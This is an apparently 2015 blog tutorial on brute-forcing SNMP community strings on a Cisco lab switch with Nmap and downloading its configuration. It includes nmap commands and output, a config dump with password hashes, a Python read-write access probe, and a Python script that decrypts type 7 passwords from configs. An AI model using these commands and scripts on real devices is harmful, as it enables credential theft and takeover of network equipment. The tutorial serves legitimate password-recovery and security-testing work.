Wednesday, March 4, 2015

Brute Forcing SNMP with NMAP

Have you ever been on site and no one could remember the password for a network device you needed to log into? Using NMAP and a pre-built text file of community-string guesses, it may be possible to quickly pull down the device's configuration over SNMP.

Once you have the configuration you may find the password in plain text, or as a reversible type 7 string. If it is stored as a type 5 secret instead, you can use my blog on "Decrypting Cisco type 5 passwords" to recover it.

A lot of network devices have an SNMP Read/Write (RW) community string configured, and if they do NMAP has a script (snmp-ios-config) that uses it to pull down the configuration. But what if you don't know the RW community string? Luckily "private" is the factory-default RW string on a lot of devices (with "public" as the default Read Only string), and NMAP has a script (snmp-brute) to guess it!

To get started, create a file with your guesses, one per line. I usually start with just private in the file. If that doesn't work then I paste in my list of guesses. There are a lot of password lists on the Internet but I haven't found any SNMP-specific ones. What I have done is created a list based on all the switch/router configs that I have in my possession. (NMAP also ships its own list, nselib/data/snmpcommunities.lst, which snmp-brute falls back to when you don't pass a file.) If the script finds a community string it prints it out with the words "Valid credentials". A note here: "Valid credentials" only means the agent answered a GET with that string, so the script reports a RW community string and a Read Only (RO) string identically. The script used to pull down the configuration ONLY works with the RW string, because it works by writing to a Cisco MIB object that tells the switch to send its running config to a TFTP server that NMAP starts on your machine. That also means the switch must be able to reach your host on UDP/69, so check any host firewall first.

As always, DO NOT use this on a switch you don't own or have explicit written permission to work on. This script was run against a Cisco switch in my test lab. It wasn't connected to anything except my laptop.

Let's get started! Run this script and hopefully find a valid RW community string. The target address is left out of the commands and output below. One tip: add -p 161 to this first command too. Without it NMAP probes its top 1000 UDP ports before the script runs, which is why the run below took almost 14 minutes for a single host.

nmap -sU --script snmp-brute --script-args snmp-brute.communitiesdb=c:\tftp-root\snmp-string.txt

Starting Nmap 6.47 ( ) at 2015-03-03 15:50 Pacific Standard Time
Stats: 0:13:44 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 86.13% done; ETC: 16:06 (0:01:52 remaining)
Stats: 0:13:45 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 86.22% done; ETC: 16:06 (0:01:52 remaining)
Nmap scan report for
Host is up (0.0057s latency).
Not shown: 996 closed ports
67/udp  open|filtered dhcps
123/udp open          ntp
161/udp open          snmp
| snmp-brute:
|   private - Valid credentials
|_  public - Valid credentials
162/udp open|filtered snmptrap
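Both strings came back as "Valid credentials", which says nothing about which one can write. Here is an added check (my example, not code from the original post or from Nmap) that settles it before snmp-ios-config is run: an SNMPv1 GET of sysLocation.0, followed by a SET of that same value back to the device, which changes nothing but is refused or ignored unless the community is RW. It is hand-rolled BER over UDP with no third-party library; the host and community are command-line arguments and 192.0.2.1 in the usage note is a placeholder address.

```python
"""Tell a read/write SNMP community from a read-only one.

Added example, not from the original post or from Nmap: snmp-brute reports
"Valid credentials" for any community that answers a GET, so before running
snmp-ios-config this confirms write access with a harmless SNMPv1 SET that
writes sysLocation.0 back to its current value.  Hand-rolled BER/SNMPv1 over
UDP, no third-party library.  Host and community come from the command line.
"""
import socket
import sys

SYS_LOCATION_0 = (1, 3, 6, 1, 2, 1, 1, 6, 0)   # RFC 1213 sysLocation.0
GET_REQUEST, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA2, 0xA3


def _tlv(tag, body):
    """BER tag-length-value; long-form length for bodies of 128+ bytes."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    ln = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(ln)]) + ln + body


def _integer(v):
    # non-negative only; the extra byte keeps the sign bit clear (128 -> 00 80)
    return _tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))


def _oid(arcs):
    body = bytes([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        enc = [arc & 0x7F]
        arc >>= 7
        while arc:                      # base-128, high bit set on all but the last byte
            enc.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        body += bytes(enc)
    return _tlv(0x06, body)


def build_message(community, pdu_tag, request_id, value):
    """SNMPv1 Message ::= SEQUENCE { version 0, community, PDU }."""
    varbind = _tlv(0x30, _oid(SYS_LOCATION_0) + value)
    pdu = _tlv(pdu_tag, _integer(request_id) + _integer(0) + _integer(0)
               + _tlv(0x30, varbind))
    return _tlv(0x30, _integer(0) + _tlv(0x04, community.encode()) + pdu)


def build_get(community, request_id=1):
    return build_message(community, GET_REQUEST, request_id, b"\x05\x00")  # NULL value


def build_set(community, location, request_id=2):
    return build_message(community, SET_REQUEST, request_id, _tlv(0x04, location))


def _read_tlv(buf, pos):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        k = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + ln], pos + ln


def parse_response(msg):
    """Return (error_status, first varbind value) from a GetResponse."""
    _, body, _ = _read_tlv(msg, 0)
    _, _, p = _read_tlv(body, 0)          # version
    _, _, p = _read_tlv(body, p)          # community
    tag, pdu, _ = _read_tlv(body, p)
    if tag != GET_RESPONSE:
        raise ValueError("not a GetResponse PDU: tag 0x%02x" % tag)
    _, _, p = _read_tlv(pdu, 0)           # request-id
    _, err, p = _read_tlv(pdu, p)         # error-status (0 = noError)
    _, _, p = _read_tlv(pdu, p)           # error-index
    _, vbl, _ = _read_tlv(pdu, p)
    _, vb, _ = _read_tlv(vbl, 0)
    _, _, p = _read_tlv(vb, 0)            # OID
    _, value, _ = _read_tlv(vb, p)
    return int.from_bytes(err, "big"), value


def classify(host, community, timeout=2.0):
    """'none' (no answer), 'ro' (GET ok, SET refused) or 'rw' (SET accepted)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.sendto(build_get(community), (host, 161))
            err, location = parse_response(sock.recv(4096))
        except socket.timeout:
            return "none"                 # agents drop packets with an unknown community
        if err:
            return "none"
        try:
            # Write back the value we just read: no change on the device, but
            # an RO community cannot do it.
            sock.sendto(build_set(community, location), (host, 161))
            err, _ = parse_response(sock.recv(4096))
            return "rw" if err == 0 else "ro"
        except socket.timeout:
            return "ro"                   # IOS answers an RO community's SET with silence


if __name__ == "__main__":
    print(classify(sys.argv[1], sys.argv[2]))
```

Run it as `python snmp_rw_check.py 192.0.2.1 private` against the lab switch; only a community that prints `rw` is worth handing to snmp-ios-config. The SET writes the existing sysLocation value back, so nothing on the device changes, but the attempt will still show up as an authentication-failure trap or syslog entry if the string is read-only.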

In this case private was being used as the RW community string. Now that we have the RW community string we can run the script that pulls down the configuration. On this switch there is a type 7 password! Type 7 is a reversible fixed-key XOR, not a hash, so in that case just hit the iOS App Store or Google Play store and grab a "Cisco Type 7" app. It will recover the password in a split second without a word list. The "secret 5" line in the same config is a salted MD5 hash and needs the word-list approach from my type 5 post.

nmap -sU -p 161 --script snmp-ios-config --script-args snmpcommunity=private

Starting Nmap 6.47 ( ) at 2015-03-03 15:23 Pacific Standard Time
Nmap scan report for
Host is up (0.0031s latency).
161/udp open  snmp
| snmp-ios-config:
| !
| ! Last configuration change at 15:21:28 PST Tue Mar 3 2015 by mhubbard
| ! NVRAM config last updated at 15:21:31 PST Tue Mar 3 2015 by mhubbard
| !
| version 15.0
| no service pad
| service tcp-keepalives-in
| service tcp-keepalives-out
| service timestamps debug datetime msec localtime show-timezone
| service timestamps log datetime msec localtime show-timezone
| service password-encryption
| service sequence-numbers
| !
| hostname ACME_Test
| !
| boot-start-marker
| boot-end-marker
| !
| !
| username Test privilege 15 password 7 0037312531682F2506324F41
| username cisco privilege 15 secret 5 $1$CxMS$kdjNOfZxN6qcqqCWBDEvQ1
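As an added example (mine, not code from the original post or from any of the phone apps), here is the type 7 reversal those apps perform, run over the config lines above. Type 7 is a fixed-key XOR: the first two digits of the string are a decimal offset into a 53-byte key, and every following hex pair is one password byte XORed with the next key byte. The sample config below reuses the two username lines from the dump above plus one constructed "enable password" line; type 5 entries are only reported, since they need the word-list attack from the other post.

```python
"""Recover Cisco type 7 passwords from a config pulled by snmp-ios-config.

Added example, not from the original post: this is the reversal the
"Cisco Type 7" phone apps perform.  Type 7 is a fixed-key XOR (the two
leading digits are an offset into the key), so no word list is needed;
type 5 entries are salted MD5-crypt hashes and are only reported here.
"""
import re

# IOS's constant key stream for "service password-encryption"
_XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# "<context> password|secret <5|7> <value>", e.g. "username Test privilege 15 password 7 ..."
_CRED = re.compile(r"^\s*(?P<ctx>.*?)\s*\b(?:password|secret)\s+(?P<type>[57])\s+(?P<value>\S+)")


def type7_decrypt(enc):
    """'SS' + hex pairs -> plaintext, SS being the decimal key offset."""
    if len(enc) < 4 or len(enc) % 2:
        raise ValueError("type 7 string must be at least 4 characters and even length")
    seed = int(enc[:2], 10)
    data = bytes.fromhex(enc[2:])
    return bytes(b ^ _XLAT[(seed + i) % len(_XLAT)]
                 for i, b in enumerate(data)).decode("latin-1")


def type7_encrypt(plain, seed=0):
    """Inverse of type7_decrypt; used here only to build a sample line."""
    data = bytes(b ^ _XLAT[(seed + i) % len(_XLAT)]
                 for i, b in enumerate(plain.encode("latin-1")))
    return "%02d%s" % (seed, data.hex().upper())


def harvest(config):
    """List (context, type, plaintext-or-hash) for every password/secret line."""
    found = []
    for line in config.splitlines():
        m = _CRED.match(line.lstrip("| "))      # tolerate Nmap's "| " output prefix
        if not m:
            continue
        if m["type"] == "7":
            found.append((m["ctx"], 7, type7_decrypt(m["value"])))
        else:
            found.append((m["ctx"], 5, m["value"]))   # MD5-crypt: needs a word-list attack
    return found


# Constructed sample: the two username lines from the config dump above plus
# one "enable password" line generated here with type7_encrypt.
SAMPLE_CONFIG = "\n".join([
    "| hostname ACME_Test",
    "| username Test privilege 15 password 7 0037312531682F2506324F41",
    "| username cisco privilege 15 secret 5 $1$CxMS$kdjNOfZxN6qcqqCWBDEvQ1",
    "| enable password 7 " + type7_encrypt("lab-enable", seed=7),
])

if __name__ == "__main__":
    for ctx, kind, value in harvest(SAMPLE_CONFIG):
        label = "recovered" if kind == 7 else "type 5 hash, crack offline"
        print("%-30s %s: %s" % (ctx, label, value))
```

Running it prints the Test account's password in clear and the cisco account's type 5 hash untouched. The seed can be any two digits IOS chooses, which is why the same password shows up as different type 7 strings on different lines; the decoder handles that because the offset is carried in the string itself.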
